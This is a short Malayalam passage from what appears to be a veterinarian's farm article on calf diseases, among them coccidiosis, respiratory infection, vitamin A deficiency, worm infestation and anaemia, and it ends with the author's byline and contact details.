കുഞ്ഞു കിടാക്കളെ ബാധിക്കുന്ന മറ്റൊരു പ്രധാന രോഗവും, രക്തവും കഫവും കലർന്ന വയറിളക്കത്തിന് കാരണമാവുകയും ചെയ്യുന്ന പ്രോട്ടോസോവൽ രോഗമാണ് കോക്സിഡിയോസിസ് അഥവാ രക്താതിസാരരോഗം. കൃത്യമായ ചികിത്സ ലഭ്യമാക്കാത്ത പക്ഷം കുടലിലെ സ്തരങ്ങൾ ഇളകി പുറത്തു വരുന്നതിനും തുടർന്ന് മരണത്തിന് തന്നെയും കാരണമാവും. കാഷ്ട പരിശോധന നടത്തി രോഗം സ്ഥീതികരിച്ച് ഉടൻ ചികിത്സ ലഭ്യമാക്കേണ്ടതുണ്ട്.

ശ്വാസകോശത്തിലെ അണുബാധ, വയറിളക്കം, വിറ്റാമിൻ എ യുടെ അപര്യാപ്തത തുടങ്ങിയവയൊക്കെയാണ് കന്നുകുട്ടികളെ ബാധിക്കാൻ സാധ്യതയുള്ള മറ്റു രോഗങ്ങൾ. രോമം കൊഴിഞ്ഞുപോവൽ കണ്ണിൽ നിന്നും വെള്ളമൊലിക്കൽ എന്നിവയെല്ലാം വിറ്റാമിൻ എ യുടെ അപര്യാപ്തതാ ലക്ഷണങ്ങളാണ്. മണ്ണുതീറ്റ, വയറു ചാടൽ, രോമം കൊഴിച്ചിൽ തുടർച്ചയായ ക്ഷീണം എന്നിവയെല്ലാം വിരബാധയുടെയും ലക്ഷണങ്ങളാവാം. കന്നുകുട്ടികളിലെ വിളർച്ചാബാധയെയും സൂക്ഷിക്കേണ്ടതുണ്ട്.
Also Read: ക്ഷീര സഹകരണ സംഘങ്ങളുടെ ഭാവി ആര് നിശ്ചയിക്കും?

Dr. Muhammed Asif M

വെറ്ററിനറി ഡോക്ടർ, ഫാം ജേര്‍ണലിസ്റ്റ്, ഡയറി കണ്‍സള്‍ട്ടന്റ് 9495187522 asifmasifvet@gmail.com